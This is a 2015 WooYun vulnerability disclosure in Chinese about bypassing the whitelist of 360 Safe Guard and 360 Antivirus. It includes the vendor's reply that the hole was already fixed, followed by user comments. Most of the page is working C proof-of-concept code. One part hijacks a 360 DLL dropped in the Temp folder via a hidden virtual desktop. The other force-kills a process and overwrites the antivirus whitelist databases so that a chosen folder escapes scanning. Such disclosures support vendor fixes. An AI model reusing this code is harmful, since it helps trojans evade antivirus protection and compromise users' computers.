2015-02-25: 细节已通知厂商并且等待厂商处理中 2015-02-26: 厂商已经确认,细节仅向厂商公开 2015-03-01: 细节向第三方安全合作伙伴开放 2015-04-22: 细节向核心白帽子及相关领域专家公开 2015-05-02: 细节向普通白帽子公开 2015-05-12: 细节向实习白帽子公开 2015-05-27: 细节向公众公开
提升权限将特定目录添加到360安全卫士和杀毒的白名单中。
通过创建虚拟桌面提升自身权限,释放原设定好的白名单数据库文件替换掉现有白名单数据库文件speedmem2.hg和sl2.db,达到添加制定目录为信任目录的结果,致使木马逃避掉360杀毒的扫描。
提升提升权限部分:
HINSTANCE hInstance = NULL;DWORD WINAPI MainBacak(LPVOID lpParameter){ SetPriorityClass( GetCurrentProcess(), HIGH_PRIORITY_CLASS ); char MydirPath[MAX_PATH]; SHGetSpecialFolderPath(NULL,MydirPath,CSIDL_PROFILE,0); CHAR MyDir[MAX_PATH]; wsprintf(MyDir,"%s\\Local Settings\\Temp\\",MydirPath); const int buf_size = 1024; CHAR buf[buf_size]; DWORD dwBufWrittenSize; HANDLE hDir; hDir = CreateFile(MyDir, FILE_LIST_DIRECTORY,FILE_SHARE_READ|FILE_SHARE_DELETE,NULL,OPEN_EXISTING,FILE_FLAG_BACKUP_SEMANTICS, NULL); if (hDir == INVALID_HANDLE_VALUE) { CloseHandle(hDir); exit(0); } while(1) { if(ReadDirectoryChangesW(hDir, &buf, buf_size, TRUE , FILE_NOTIFY_CHANGE_FILE_NAME| FILE_NOTIFY_CHANGE_DIR_NAME| FILE_NOTIFY_CHANGE_ATTRIBUTES| FILE_NOTIFY_CHANGE_SIZE| FILE_NOTIFY_CHANGE_LAST_WRITE| FILE_NOTIFY_CHANGE_LAST_ACCESS| FILE_NOTIFY_CHANGE_CREATION| FILE_NOTIFY_CHANGE_SECURITY, &dwBufWrittenSize, NULL, NULL)) { FILE_NOTIFY_INFORMATION * pfiNotifyInfo = (FILE_NOTIFY_INFORMATION*)buf; char* pszMultiByte; pszMultiByte = new char[512]; ZeroMemory( pszMultiByte, 512); WideCharToMultiByte(CP_ACP, 0,pfiNotifyInfo->FileName, pfiNotifyInfo->FileNameLength/2, pszMultiByte, 512, NULL, NULL); char *p; p=strstr(pszMultiByte,"360net.dll"); if(p!=NULL) { char tmp360net[MAX_PATH]={0}; lstrcpy(tmp360net,pszMultiByte); switch(pfiNotifyInfo->Action) { case FILE_ACTION_ADDED: delete []pszMultiByte; break; case FILE_ACTION_REMOVED: delete []pszMultiByte; break; case FILE_ACTION_MODIFIED: lstrcat(MyDir,tmp360net); if (CopyFile("Dll.dll",MyDir,FALSE)!=0) { delete []pszMultiByte; CloseHandle(hDir); return 1; } else { delete []pszMultiByte; return 0; break; } default: break; } } } } CloseHandle(hDir); return 0; }DWORD WINAPI MainDesk(LPVOID lpParameter){ HDESK hDesk = CreateDesktop("Virtual", NULL, NULL, DF_ALLOWOTHERACCOUNTHOOK, DESKTOP_CREATEWINDOW| DESKTOP_ENUMERATE| DESKTOP_READOBJECTS| DESKTOP_WRITEOBJECTS| DESKTOP_HOOKCONTROL , NULL ); STARTUPINFO si = {sizeof(si)}; si.lpDesktop = "Virtual"; si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_HIDE; PROCESS_INFORMATION pi = {0}; if(!CreateProcess(NULL,(LPSTR)(LPCSTR)lpParameter, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) { CloseHandle(pi.hThread); CloseHandle(pi.hProcess); CloseDesktop(hDesk); return 0; } return 1;}int main(int argc, char* argv[]){ char safe[MAX_PATH]; HKEY hkey; DWORD type = REG_SZ; DWORD buffSize=sizeof(safe); if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS) { RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize); RegCloseKey(hkey); } else { if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS) { RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize); RegCloseKey(hkey); } } char tmp360safe[MAX_PATH]={0}; lstrcpy(tmp360safe,safe); lstrcat(tmp360safe,"\\modules\\360Inst.exe"); char MyDir[MAX_PATH]; SHGetSpecialFolderPath(NULL,MyDir,CSIDL_PROFILE,0); strcat(MyDir,"\\Local Settings\\Temp\\"); MessageBox(NULL,MyDir,NULL,NULL); ExitProcess(0); if (access(tmp360safe,0)==0) { while(1) { HANDLE handle[2]; handle[1]=CreateThread(NULL,NULL,MainBacak,NULL,CREATE_SUSPENDED,NULL); SetThreadPriority(handle[1],THREAD_PRIORITY_HIGHEST); ResumeThread(handle[1]); handle[2]=CreateThread(NULL,NULL,MainDesk,tmp360safe,CREATE_SUSPENDED,NULL); SetThreadPriority(handle[2],THREAD_PRIORITY_LOWEST); ResumeThread(handle[2]); WaitForSingleObject(handle[2],INFINITE); DWORD lpExitCode2; GetExitCodeThread(handle[2],&lpExitCode2); if (lpExitCode2==0) { CloseHandle(handle[2]); CloseHandle(handle[1]); continue; } WaitForSingleObject(handle[1],INFINITE); DWORD lpExitCode; GetExitCodeThread(handle[1],&lpExitCode); if (lpExitCode==1) { CloseHandle(handle[1]); CloseHandle(handle[2]); Sleep(15000); } else { CloseHandle(handle[1]); CloseHandle(handle[2]); } } } return 0;}
替换白名单数据库部分:
int Storm(int count){ unsigned long Time=GetTickCount(); int seed=rand()+3; seed=(seed*Time)%count; return seed;}BOOL CALLBACK EnumWindowsProc(HWND hwnd,LPARAM IParam)//回调函数{ PostMessage(hwnd, WM_CLOSE, 0, 0); return TRUE;}extern "C" __declspec(dllexport)void HttpCreateDownloadObj(){ char taskkill[MAX_PATH]; wsprintf(taskkill,"taskkill /im load.exe /f"); WinExec(taskkill,SW_HIDE); EnumWindows(EnumWindowsProc,0); char safe[MAX_PATH]; char SD[MAX_PATH]; HKEY hkey; DWORD type = REG_SZ; DWORD buffSize=sizeof(safe); DWORD buffSize1=sizeof(SD); if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS) { RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize); RegCloseKey(hkey); } else { if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS) { RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize); RegCloseKey(hkey); } } if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360sd.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS) { RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)SD,&buffSize1); RegCloseKey(hkey); } else { if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360sd.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS) { RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)SD,&buffSize1); RegCloseKey(hkey); } } char tmp360safe[MAX_PATH]={0}; lstrcpy(tmp360safe,safe); lstrcat(tmp360safe,"\\modules\\360Inst.exe"); char MydirPath[MAX_PATH]; SHGetSpecialFolderPath(NULL,MydirPath,CSIDL_PROFILE,0); CHAR MyDir[MAX_PATH]; wsprintf(MyDir,"%s\\Local Settings\\Temp\\",MydirPath); CHAR speedmem[MAX_PATH]; wsprintf(speedmem,"%s\\sp%cedm%cm.hg",MyDir,'a'+Storm(26),'a'+Storm(26)); CHAR slD[MAX_PATH]; wsprintf(slD,"%s\\s%cefmm%c.ds",MyDir,'a'+Storm(26),'a'+Storm(26)); speedmemSaveFile(speedmem); sdSaveFile(slD); CHAR Newspeedmem[MAX_PATH]; wsprintf(Newspeedmem,"%s\\deepscan\\speedmem2.hg",safe); CHAR NewslD[MAX_PATH]; wsprintf(NewslD,"%s\\sl2.db",SD); DeleteFile(Newspeedmem); DeleteFile(NewslD); CopyFile(speedmem,Newspeedmem,FALSE); CopyFile(slD,NewslD,FALSE); DeleteFile(speedmem); DeleteFile(slD); return;}
speedmemSaveFile与sdSaveFile分别是生成了之前在360杀毒和360安全卫视下设定好路径的白名单数据库文件。
你们自然晓得怎么修复啦:P
危害等级:中
漏洞Rank:10
确认时间:2015-02-26 10:17
感谢乌云白帽子的报告此问题是通过360安全卫士中一处防御缺陷突破信任机制实现的白名单篡改。 我们在一个月以前就已经从其它渠道获知了该漏洞并进行了修复和升级,目前外网的最新版360都不存在此问题。
暂无
前排。
看热闹来了
想法挺有趣
我就看热闹……
@疯狗 狗哥求审核漏洞哇~http://www.wooyun.org/bugs/wooyun-2015-098220/trace/d3696fac6fedfc73e5b9cb3414e41f22 http://www.wooyun.org/bugs/wooyun-2015-098218/trace/7ede802f3e44c53f6bd9c619d4cdfb58 http://www.wooyun.org/bugs/wooyun-2015-098216/trace/8622604ba8dbab65162a1716ffd597d6 http://www.wooyun.org/bugs/wooyun-2015-098214/trace/d5f7b1cdff61c342ea8180df5ab97902 http://www.wooyun.org/bugs/wooyun-2015-098213/trace/7afe8ec3e38a4f0ca605bbe66410cab9 http://www.wooyun.org/bugs/wooyun-2015-098182/trace/f63e50138f738b4520247685231d625b http://www.wooyun.org/bugs/wooyun-2015-098181/trace/3e84e04ccad83703fa88cc5da607d53a http://www.wooyun.org/bugs/wooyun-2015-098086/trace/bbba155e0342206751099e13e46988a2 http://www.wooyun.org/bugs/wooyun-2015-098085/trace/a7013d64e1e464e91f768c93532ce809 http://www.wooyun.org/bugs/wooyun-2015-098080/trace/e201246320266c46147badb5ae8cd253 http://www.wooyun.org/bugs/wooyun-2015-097988/trace/fc118e708b58889b3eb32f22364952d7 http://www.wooyun.org/bugs/wooyun-2015-097890/trace/df69ebc6823c8cc505a360c92fb8aa16 http://www.wooyun.org/bugs/wooyun-2015-097754/trace/5cc4b0424a2adacabb6b34d50ef910af http://www.wooyun.org/bugs/wooyun-2015-095786/trace/0a7e573a6b7cb12b7421ec5a745456ae http://www.wooyun.org/bugs/wooyun-2015-094879/trace/63d9f708ea64bbe409f578cc0f769aa5
能不能把360加到黑名单……
还以为把360提权了呢
360的白名单目录你找得到吗?
@浅蓝 哥 你命真苦 都没审核通过